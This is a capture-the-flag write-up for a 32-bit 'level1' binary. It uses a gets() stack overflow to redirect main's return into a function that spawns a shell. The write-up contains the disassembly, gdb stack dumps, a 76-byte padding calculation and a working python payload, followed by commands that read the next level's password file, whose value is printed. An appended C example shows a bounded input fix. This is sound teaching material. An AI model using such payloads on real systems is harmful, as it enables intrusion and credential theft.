The code has two interesting functions, main and run. Only main is ever called, so to execute run we use a buffer overflow: main calls gets on a 64-byte stack buffer with no length check, so we feed it more than 64 bytes, overwrite the saved return address on the stack, and make main's ret jump into run.
0x08048480 <main+0>: push ebp
0x08048481 <main+1>: mov ebp,esp
0x08048483 <main+3>: and esp,0xfffffff0
0x08048486 <main+6>: sub esp,0x50
0x08048489 <main+9>: lea eax,[esp+0x10]
0x0804848d <main+13>: mov DWORD PTR [esp],eax
0x08048490 <main+16>: call 0x8048340 <gets@plt>
0x08048495 <main+21>: leave
0x08048496 <main+22>: ret
0x08048444 <run+0>: push ebp
0x08048445 <run+1>: mov ebp,esp
0x08048447 <run+3>: sub esp,0x18
0x0804844a <run+6>: mov eax,ds:0x80497c0
0x0804844f <run+11>: mov edx,eax
0x08048451 <run+13>: mov eax,0x8048570
0x08048456 <run+18>: mov DWORD PTR [esp+0xc],edx
0x0804845a <run+22>: mov DWORD PTR [esp+0x8],0x13
0x08048462 <run+30>: mov DWORD PTR [esp+0x4],0x1
0x0804846a <run+38>: mov DWORD PTR [esp],eax
0x0804846d <run+41>: call 0x8048350 <fwrite@plt>
0x08048472 <run+46>: mov DWORD PTR [esp],0x8048584
0x08048479 <run+53>: call 0x8048360 <system@plt>
0x0804847e <run+58>: leave
0x0804847f <run+59>: ret
Fig 1. Disassembly of main and run functions
The first step is to find where the return address is stored. For this we stop the program just before main begins (at its first instruction, before push ebp) and read the esp register: at that point esp points directly at the saved return address.
Reading symbols from /home/user/level1/level1...(no debugging symbols found)...done.
(gdb) b *main+0
Breakpoint 1 at 0x8048480
(gdb) run
Starting program: /home/user/level1/level1
Breakpoint 1, 0x08048480 in main ()
(gdb) p $esp
$1 = (void *) 0xbffff73c
(gdb)
Now we break right after the call to gets, input 64 random characters ('A's) and look for them on the stack.
Breakpoint 1, 0x08048495 in main ()
(gdb) x/128xb $esp
0xbffff6e0: 0xf0 0xf6 0xff 0xbf 0x2f 0x00 0x00 0x00
0xbffff6e8: 0x3c 0xf7 0xff 0xbf 0xf4 0x0f 0xfd 0xb7
0xbffff6f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff6f8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff700: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff708: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff710: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff718: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff720: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff728: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff730: 0x00 0x84 0x04 0x08 0x00 0x00 0x00 0x00
0xbffff738: 0x00 0x00 0x00 0x00 0xd3 0x54 0xe4 0xb7
0xbffff740: 0x01 0x00 0x00 0x00 0xd4 0xf7 0xff 0xbf
0xbffff748: 0xdc 0xf7 0xff 0xbf 0x58 0xc8 0xfd 0xb7
0xbffff750: 0x00 0x00 0x00 0x00 0x1c 0xf7 0xff 0xbf
0xbffff758: 0xdc 0xf7 0xff 0xbf 0x00 0x00 0x00 0x00
We can see our 64 'A's on the stack starting at 0xbffff6f0, and there is still some space between the end of them (0xbffff730) and the return address slot at 0xbffff73c. That means we need 12 more bytes of padding after the 64 'A's (0xbffff73c - 0xbffff6f0 = 0x4c = 76 bytes in total), followed by the address we want to jump to: run at 0x08048444, written little-endian.
(python -c "print('A'*64+'A'*12+'\x44\x84\x04\x08')"; cat) | ./level1
Good... Wait what?
whoami
level2
cat /home/user/level2/.pass
53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77
:)
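As an added example (not part of the original writeup), the two addresses measured above give the distance from the gets() buffer to main's saved return address, and the fix for this bug is a bounded line reader in place of gets(); the check_input() helper and its use of fmemopen() (glibc) are assumptions for testing offline.

```c
#define _GNU_SOURCE                   /* fmemopen() */
#include <stdio.h>
#include <string.h>
/* Measured in gdb above: start of the gets() buffer and the slot holding
   main's saved return address. 0xbffff73c - 0xbffff6f0 = 0x4c = 76 bytes:
   the 64-byte buffer plus the 12-byte gap the payload pads with 'A's. */
#define BUF_ADDR 0xbffff6f0ul
#define RET_ADDR 0xbffff73cul

size_t bytes_to_saved_eip(unsigned long buf_addr, unsigned long ret_addr)
{
    return (size_t)(ret_addr - buf_addr);   /* 76 for this binary */
}

/* Bounded replacement for gets(buf): reads at most size-1 bytes, strips the
   newline and rejects a line that did not fit instead of letting it spill
   onto the saved frame. Returns 1 ok, 0 EOF without data, -1 line too long. */
int read_line_bounded(char *buf, size_t size, FILE *in)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return 0;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 1;
    }
    int c = fgetc(in);
    if (c == EOF)                     /* final line without newline: fine */
        return 1;
    while (c != '\n' && c != EOF)     /* drain the overflowing remainder */
        c = fgetc(in);
    return -1;
}

/* Feed one constructed input line through the bounded reader (64-byte buffer as in level1). */
int check_input(const char *line)
{
    char buf[64];
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (in == NULL) return -2;
    int rc = read_line_bounded(buf, sizeof buf, in);
    fclose(in);
    return rc;
}

int main(void)
{
    printf("%zu bytes from buffer to saved eip; short line -> %d, overlong line -> %d\n",
           bytes_to_saved_eip(BUF_ADDR, RET_ADDR), check_input("hello\n"),
           check_input("AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA"
                       "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "\n"));
}
```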